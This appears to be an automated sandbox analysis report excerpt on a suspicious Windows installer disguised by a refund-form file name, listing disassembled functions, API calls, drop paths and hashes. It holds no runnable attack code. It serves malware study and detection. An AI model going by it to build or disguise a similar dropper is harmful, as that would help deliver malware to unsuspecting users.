                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                      • String ID: : Completed$A$C:\Users\user\AppData\Roaming\argoters\Necrotizing
                                                                                                                                      • API String ID: 2624150263-2746746851
                                                                                                                                      • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                      • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                      • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                      • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                      Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DeleteFileW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 004059F5
                                                                                                                                      • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A3D
                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A60
                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A66
                                                                                                                                      • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A76
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                      Strings
                                                                                                                                      • "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe", xrefs: 004059CC
                                                                                                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                      • \*.*, xrefs: 00405A37
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                      • String ID: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                                                      • API String ID: 2035342205-1249138816
                                                                                                                                      • Opcode ID: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                                                                                                      • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                      • Opcode Fuzzy Hash: bcbc2a7ac1b1f3fb7d07acde4e2512b3450779b38a1d7279aa7c3219c953243e
                                                                                                                                      • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                      Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets, xrefs: 004021C3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateInstance
                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets
                                                                                                                                      • API String ID: 542301482-242930795
                                                                                                                                      • Opcode ID: 0bf3dfc2339aa7d15c11075db74036d96aed453b0273c78684b575aae048cbb1
                                                                                                                                      • Instruction ID: d410e27007f87fae541732bdb1cbefdb239a2090c9e466904aadd755c5c79360
                                                                                                                                      • Opcode Fuzzy Hash: 0bf3dfc2339aa7d15c11075db74036d96aed453b0273c78684b575aae048cbb1
                                                                                                                                      • Instruction Fuzzy Hash: 0D413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                                                                      Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: p!C$p!C
                                                                                                                                      • API String ID: 0-3125587631
                                                                                                                                      • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                      • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                      • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                      • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                      Function 00406B15 Relevance: .3, Instructions: 334COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                                                                      • Instruction ID: dcc2b246e3e85771245330633344c28aad3b6f2e7effc766acd5add5c88cb85a
                                                                                                                                      • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                                                                                                      • Instruction Fuzzy Hash: DBE18A7190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                      Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                      • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                      • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                      • String ID: : Completed$N$gC@
                                                                                                                                      • API String ID: 3103080414-710371768
                                                                                                                                      • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                      • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                      • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                      • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                      Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                      • DrawTextW.USER32(00000000,Skolemoden Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                      • String ID: F$Skolemoden Setup
                                                                                                                                      • API String ID: 941294808-3508046950
                                                                                                                                      • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                      • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                      • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                      • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                      Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                        • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                        • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                      • wsprintfA.USER32 ref: 00405F85
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                        • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                        • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                      • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                      • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                      • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                      • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                      Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                      Strings
                                                                                                                                      • *?|<>/":, xrefs: 004065A0
                                                                                                                                      • "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe", xrefs: 0040654E
                                                                                                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                      • String ID: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                      • API String ID: 589700163-3432993320
                                                                                                                                      • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                      • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                      • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                      • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                      Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 0040430B
